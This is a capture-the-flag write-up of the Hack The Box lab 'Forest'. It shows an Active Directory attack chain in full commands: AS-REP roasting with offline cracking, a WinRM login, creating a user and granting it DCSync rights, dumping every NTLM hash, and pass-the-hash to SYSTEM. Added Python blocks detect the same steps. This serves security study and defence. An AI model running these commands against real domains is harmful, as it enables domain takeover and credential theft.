Machine Name: Forest
OS: Windows
Category: Active Directory
Author: egre55 & mrb3n

Overview

Forest is an easy-difficulty Windows machine that represents a Domain Controller with Microsoft Exchange installed. The box demonstrates common Active Directory misconfigurations, including anonymous LDAP binds, Kerberos pre-authentication disabled on a service account, and over-privileged Exchange security groups. Exploitation ultimately leads to full domain compromise via a DCSync attack.

Enumeration

Nmap Scan

Initial port scanning reveals that the target is a Domain Controller:

nmap -Pn -sC -sV  -oA forest 10.129.32.118 -T4

Key findings:

  • LDAP (389, 3268)
  • Kerberos (88)
  • SMB (445)
  • WinRM (5985)
  • DNS (53)

The host identifies itself as FOREST.htb.local, confirming it is the domain controller for the htb.local domain.

The domain is added to /etc/hosts for proper resolution.

LDAP Enumeration (Anonymous Bind)

LDAP is tested for anonymous access:

ldapsearch -x -H ldap://10.10.10.161 -b "dc=htb,dc=local"

The query succeeds without credentials, confirming that anonymous (null) bind is enabled.

So let's play with it.

Enumerate All Computers

# FOREST, Domain Controllers, htb.local
dn: CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
dNSHostName: FOREST.htb.local
# EXCH01, Computers, htb.local
dn: CN=EXCH01,CN=Computers,DC=htb,DC=local
dNSHostName: EXCH01.htb.local

Enumerate All Groups

┌──(kali㉿kali)-[~/HTB/forset]
└─$ ldapsearch -x -H ldap://10.129.32.118 -b "DC=htb,DC=local" "(objectClass=group)" cn

And we get:

Built-in / Default Groups

  • Users
  • Guests
  • Remote Desktop Users
  • Network Configuration Operators
  • Performance Monitor Users
  • Performance Log Users
  • Distributed COM Users
  • IIS_IUSRS
  • Cryptographic Operators
  • Event Log Readers
  • Certificate Service DCOM Access
  • RDS Remote Access Servers
  • RDS Endpoint Servers
  • RDS Management Servers
  • Hyper-V Administrators
  • Access Control Assistance Operators
  • Remote Management Users
  • System Managed Accounts Group
  • Storage Replica Administrators
  • Pre-Windows 2000 Compatible Access
  • Incoming Forest Trust Builders
  • Windows Authorization Access Group
  • Terminal Server License Servers

Domain Groups (Users Container)

  • Domain Computers
  • Cert Publishers
  • Domain Users
  • Domain Guests
  • Group Policy Creator Owners
  • RAS and IAS Servers
  • Allowed RODC Password Replication Group
  • Denied RODC Password Replication Group
  • Enterprise Read-only Domain Controllers
  • Cloneable Domain Controllers
  • Protected Users
  • Key Admins
  • Enterprise Key Admins
  • DnsAdmins
  • DnsUpdateProxy

Microsoft Exchange Security Groups

  • Organization Management
  • Recipient Management
  • View-Only Organization Management
  • Public Folder Management
  • UM Management
  • Help Desk
  • Records Management
  • Discovery Management
  • Server Management
  • Delegated Setup
  • Hygiene Management
  • Compliance Management
  • Security Reader
  • Security Administrator
  • Exchange Servers
  • Exchange Trusted Subsystem
  • Managed Availability Servers
  • Exchange Windows Permissions
  • ExchangeLegacyInterop

Other

  • Exchange Install Domain Servers
  • test

Built-in / Default Accounts

  • Guest
  • DefaultAccount

Computer Accounts

  • FOREST$
  • EXCH01$

Human User Accounts (Employees)

  • sebastien
  • lucinda
  • andy
  • mark
  • santi
  • svc-alfresco

Foothold — AS-REP Roasting

Based on known Alfresco setup behavior, the svc-alfresco account is suspected to have Kerberos pre-authentication disabled.
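The same condition can be checked from the defender's side before anyone requests a ticket. The following is an added example, not code from the original writeup: it parses LDIF in the shape ldapsearch returns (comment lines, wrapped continuation lines, `::` base64 values), lists computer objects by dNSHostName as the enumeration above does, and flags every account whose userAccountControl carries the DONT_REQ_PREAUTH bit (0x400000). The LDIF is constructed; the userAccountControl values and description attributes are assumptions, not data taken from the box.

```python
"""Audit an LDIF export for accounts that do not require Kerberos pre-auth.

Added example, not from the original writeup. The sample LDIF is constructed
in the shape of ldapsearch output; the attribute values are assumptions.
"""
import base64
import re

# userAccountControl bits as documented by Microsoft for the attribute.
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# Constructed sample: four objects, one wrapped line, one base64 (::) value.
SAMPLE_LDIF = """\
# FOREST, Domain Controllers, htb.local
dn: CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
objectClass: computer
sAMAccountName: FOREST$
dNSHostName: FOREST.htb.local
userAccountControl: 532480

# svc-alfresco, Service Accounts, htb.local
dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
objectClass: user
sAMAccountName: svc-alfresco
description: service account for Alfresco; pre-authentication was dis
 abled by the installer (assumed description)
userAccountControl: 4260352

# andy, Users, htb.local
dn: CN=andy,CN=Users,DC=htb,DC=local
objectClass: user
sAMAccountName: andy
description:: U2VydmljZSBhY2NvdW50
userAccountControl: 66048

# Guest, Users, htb.local
dn: CN=Guest,CN=Users,DC=htb,DC=local
objectClass: user
sAMAccountName: Guest
userAccountControl: 4260354
"""

ATTR_RE = re.compile(r"^([A-Za-z][\w.;-]*)(::?) ?(.*)$")


def parse_ldif(text):
    """Return a list of entries, each a dict of attribute -> list of values.

    Handles '#' comment lines, continuation lines (a leading space means the
    line continues the previous attribute) and '::' base64-encoded values.
    """
    # Unfold: a newline followed by a single space joins with the line above.
    unfolded = re.sub(r"\n ", "", text)
    entries, current = [], {}
    for line in unfolded.splitlines():
        if not line.strip():            # a blank line ends an entry
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        m = ATTR_RE.match(line)
        if not m:
            raise ValueError(f"malformed LDIF line: {line!r}")
        attr, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return entries


def by_name(entries, sam):
    """Look up one entry by sAMAccountName (None if absent)."""
    for e in entries:
        if e.get("sAMAccountName", [None])[0] == sam:
            return e
    return None


def list_computers(entries):
    """dNSHostName of every computer object, as enumerated on the page."""
    return sorted(e["dNSHostName"][0] for e in entries
                  if "computer" in e.get("objectClass", []) and "dNSHostName" in e)


def preauth_disabled(entries):
    """(sAMAccountName, is_enabled) for each account with DONT_REQ_PREAUTH set.

    Disabled accounts are reported too: the flag survives re-enabling.
    """
    found = []
    for e in entries:
        if "userAccountControl" not in e:
            continue
        uac = int(e["userAccountControl"][0])
        if uac & DONT_REQ_PREAUTH:
            found.append((e["sAMAccountName"][0], not uac & ACCOUNTDISABLE))
    return found


if __name__ == "__main__":
    objs = parse_ldif(SAMPLE_LDIF)
    print("computers:", list_computers(objs))
    for name, enabled in preauth_disabled(objs):
        print(f"pre-auth disabled: {name} ({'enabled' if enabled else 'disabled'})")
```

Run against a real export (`ldapsearch ... "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"` would even let the server do the bit test), any enabled hit is an account whose AS-REP can be cracked offline by anyone able to name it.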

Using Impacket's GetNPUsers.py, an AS-REP hash is requested:

./GetNPUsers.py -dc-ip 10.129.32.118 'htb.local/' -request -outputfile asrep_hashes.txt

An AS-REP is returned for svc-alfresco. Its encrypted part is keyed with the account's password-derived key, which is why it can be cracked offline.

The hash is cracked with hashcat (mode 18200, Kerberos 5 AS-REP etype 23):

hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt --force

Recovered credentials:

svc-alfresco : s3rvice
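What the request above leaves behind on the domain controller is a Kerberos Authentication Service event (4768) with pre-authentication type 0, and, for every enumerated account that does require pre-auth, a refusal with result code 0x19. The detection below is an added example, not part of the original writeup: it works on a constructed key=value reduction of the 4768 fields (real events are XML), the source addresses are constructed, and `sweep_threshold` is an assumed tuning knob.

```python
"""Detect AS-REP roasting in Kerberos TGT request events (4768).

Added example, not from the original writeup. Real 4768 events are XML; the
lines below are a constructed key=value reduction of the fields that matter.
"""
import re
from collections import defaultdict

# Constructed sample. PreAuthType 0 = no pre-authentication sent;
# TicketEncryptionType 0x17 = RC4-HMAC, 0x12 = AES256; Status 0x0 = TGT
# issued; Status 0x19 = KDC_ERR_PREAUTH_REQUIRED (account needs pre-auth).
SAMPLE_4768 = [
    "EventID=4768 TargetUserName=andy PreAuthType=2 TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.10.50",
    "EventID=4768 TargetUserName=FOREST$ PreAuthType=2 TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.10.161",
    "EventID=4768 TargetUserName=sebastien PreAuthType=0 TicketEncryptionType=0x17 Status=0x19 IpAddress=10.10.14.9",
    "EventID=4768 TargetUserName=lucinda PreAuthType=0 TicketEncryptionType=0x17 Status=0x19 IpAddress=10.10.14.9",
    "EventID=4768 TargetUserName=svc-alfresco PreAuthType=0 TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.9",
    "EventID=4769 TargetUserName=andy TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.10.50",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one key=value line into a dict."""
    return dict(FIELD_RE.findall(line))


def asrep_roast_findings(lines, sweep_threshold=2):
    """Return (issued, sweeps).

    issued: (user, source_ip, severity) for every TGT handed out with no
            pre-authentication. 'high' when RC4 was used, which is the form
            hashcat mode 18200 cracks; 'medium' for AES etypes.
    sweeps: source_ip -> sorted users, for sources that probed at least
            `sweep_threshold` distinct accounts without pre-auth. Refusals
            (0x19) count: an enumeration tool tries every user it knows.
    """
    issued, probes = [], defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4768" or ev.get("PreAuthType") != "0":
            continue
        probes[ev["IpAddress"]].add(ev["TargetUserName"])
        if ev.get("Status") == "0x0":
            sev = "high" if ev.get("TicketEncryptionType") == "0x17" else "medium"
            issued.append((ev["TargetUserName"], ev["IpAddress"], sev))
    sweeps = {ip: sorted(users) for ip, users in probes.items()
              if len(users) >= sweep_threshold}
    return issued, sweeps


if __name__ == "__main__":
    issued, sweeps = asrep_roast_findings(SAMPLE_4768)
    for user, ip, sev in issued:
        print(f"[{sev}] AS-REP issued without pre-auth: {user} from {ip}")
    for ip, users in sweeps.items():
        print(f"[sweep] {ip} probed {len(users)} accounts without pre-auth: {users}")
```

The `issued` list is the actionable part: each entry names an account whose encrypted AS-REP has already left the DC, so the fix is to clear the flag and rotate that password, not just to block the source.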

Initial Access

Since WinRM is exposed, the credentials are tested using Evil-WinRM:

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

Authentication is successful, providing a shell as htb\svc-alfresco.

The user flag is obtained from:

C:\Users\svc-alfresco\Desktop\user.txt

Privilege Escalation — BloodHound Analysis

SharpHound is uploaded and executed to collect Active Directory data:

.\SharpHound.exe -c All

The data is imported into BloodHound for analysis.


Key findings:

  • svc-alfresco is a member of Account Operators (via nested groups).
  • Account Operators can create and modify users.
  • The Exchange Windows Permissions group has WriteDACL on the domain object, so its members can grant any principal the replication rights that DCSync requires.

This presents a clear path to DCSync.
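The "via nested groups" finding is a transitive-membership question, which is what BloodHound answers graphically. The block below is an added example, not the page's or BloodHound's code: it resolves nested membership by breadth-first search over a group-to-members map and reports which users reach a list of sensitive groups, with the path. The map is constructed; the intermediate group names are assumptions, since the page only states that svc-alfresco reaches Account Operators through nesting.

```python
"""Resolve nested group membership and report who reaches sensitive groups.

Added example, not from the original writeup. The membership map is
constructed; the intermediate group names are assumptions.
"""
from collections import deque

# Constructed group -> direct members (users or other groups).
MEMBERS = {
    "Account Operators": ["Privileged IT Accounts"],
    "Privileged IT Accounts": ["Service Accounts"],
    "Service Accounts": ["svc-alfresco"],
    "Exchange Windows Permissions": ["Exchange Trusted Subsystem"],
    "Exchange Trusted Subsystem": ["EXCH01$"],
    "Domain Admins": ["Administrator"],
}

# Groups whose membership should be reviewed; the three the page relies on.
SENSITIVE = ["Account Operators", "Exchange Windows Permissions", "Domain Admins"]


def effective_groups(principal, members):
    """Return {group: path} for every group `principal` belongs to directly or
    through nesting. `path` lists the groups walked, innermost first. Cycles
    (A in B, B in A) are safe: a group already reached is never re-queued."""
    member_of = {}
    for group, direct in members.items():
        for m in direct:
            member_of.setdefault(m, []).append(group)
    paths = {}
    queue = deque([(principal, [])])
    while queue:
        node, path = queue.popleft()
        for group in member_of.get(node, []):
            if group in paths:          # first visit is the shortest path
                continue
            paths[group] = path + [group]
            queue.append((group, paths[group]))
    return paths


def sensitive_reach(members, sensitive):
    """For every non-group principal, the sensitive groups it reaches."""
    groups = set(members)
    users = {m for direct in members.values() for m in direct} - groups
    report = {}
    for user in sorted(users):
        reached = effective_groups(user, members)
        hits = {g: reached[g] for g in sensitive if g in reached}
        if hits:
            report[user] = hits
    return report


if __name__ == "__main__":
    for user, hits in sensitive_reach(MEMBERS, SENSITIVE).items():
        for group, path in hits.items():
            print(f"{user} -> {group} via {' -> '.join(path)}")
```

Fed with the output of an LDAP `member` attribute dump, the same search shows every principal that lands in Account Operators or Exchange Windows Permissions without appearing in their direct member lists, which is exactly what a by-hand group review misses.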

Domain Escalation

A new domain user is created:

net user john abc123! /add /domain

The user is added to required groups:

net group "Exchange Windows Permissions" john /add
net localgroup "Remote Management Users" john /add

Using PowerView, DCSync rights are granted:

Add-ObjectACL -PrincipalIdentity john -Rights DCSync

DCSync Attack

With DCSync privileges assigned, Impacket's secretsdump is used:

impacket-secretsdump htb/john@10.10.10.161

This successfully dumps NTLM hashes for all domain users, including Administrator.
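Because secretsdump asks the DC to replicate, the dump shows up as Directory Service Access events (4662) whose Properties carry the replication control-access GUIDs, issued by a subject that is not a domain controller. The detection below is an added example, not code from the page or from Impacket: the GUIDs are the documented DS-Replication-Get-Changes rights, the event lines are a constructed key=value reduction of the 4662 fields, and the allowlist of expected replicators is an assumption.

```python
"""Flag DCSync-style replication requests in Directory Service Access
events (4662). Added example, not from the original writeup; the event lines
are a constructed key=value reduction of the relevant 4662 fields."""
import re

# Control-access right GUIDs that together allow directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals expected to replicate (assumed allowlist: the DC computer account).
EXPECTED_REPLICATORS = {"FOREST$"}

# Constructed sample. AccessMask 0x100 is Control Access; %%7688 is how the
# event renders that right; the last GUID is a constructed non-replication one.
SAMPLE_4662 = [
    "EventID=4662 SubjectUserName=FOREST$ SubjectDomainName=HTB AccessMask=0x100 "
    "Properties=%%7688;{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=john SubjectDomainName=HTB AccessMask=0x100 "
    "Properties=%%7688;{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=andy SubjectDomainName=HTB AccessMask=0x20 "
    "Properties=%%7688;{00000000-0000-0000-0000-000000000001}",
    "EventID=4662 SubjectUserName=john SubjectDomainName=HTB AccessMask=0x100 "
    "Properties=%%7688;{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)


def parse_event(line):
    """Turn one key=value line into a dict."""
    return dict(FIELD_RE.findall(line))


def dcsync_alerts(lines, expected=EXPECTED_REPLICATORS):
    """One alert per 4662 whose Properties carry a replication right and whose
    subject is not an expected replicator. `full_dump` marks events that
    include Get-Changes-All, the right that releases password hashes."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        guids = [g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))]
        rights = [REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS]
        if not rights:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject in expected:
            continue
        alerts.append({
            "subject": subject,
            "rights": rights,
            "full_dump": "DS-Replication-Get-Changes-All" in rights,
        })
    return alerts


if __name__ == "__main__":
    for a in dcsync_alerts(SAMPLE_4662):
        tag = "HASH DUMP" if a["full_dump"] else "replication"
        print(f"[{tag}] {a['subject']} requested {', '.join(a['rights'])}")
```

One caveat a practitioner will hit: 4662 is only written when the Directory Service Access audit subcategory is enabled and the domain object carries a SACL for these control-access rights; without both, a DCSync leaves no 4662 at all.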

Domain Admin Access

The Administrator NTLM hash is used to authenticate via psexec:

impacket-psexec administrator@10.10.10.161 -hashes <LM>:<NTLM>

A SYSTEM shell is obtained.

The root flag is retrieved from:

C:\Users\Administrator\Desktop\root.txt

Conclusion

Forest demonstrates how multiple low-severity Active Directory misconfigurations can be chained into a full domain compromise. Anonymous LDAP access enables extensive reconnaissance, Kerberos misconfiguration leads to credential exposure, and excessive Exchange privileges ultimately allow a DCSync attack.

This box is an excellent introduction to:

  • Active Directory enumeration
  • AS-REP roasting
  • BloodHound analysis
  • Exchange privilege abuse
  • DCSync attacks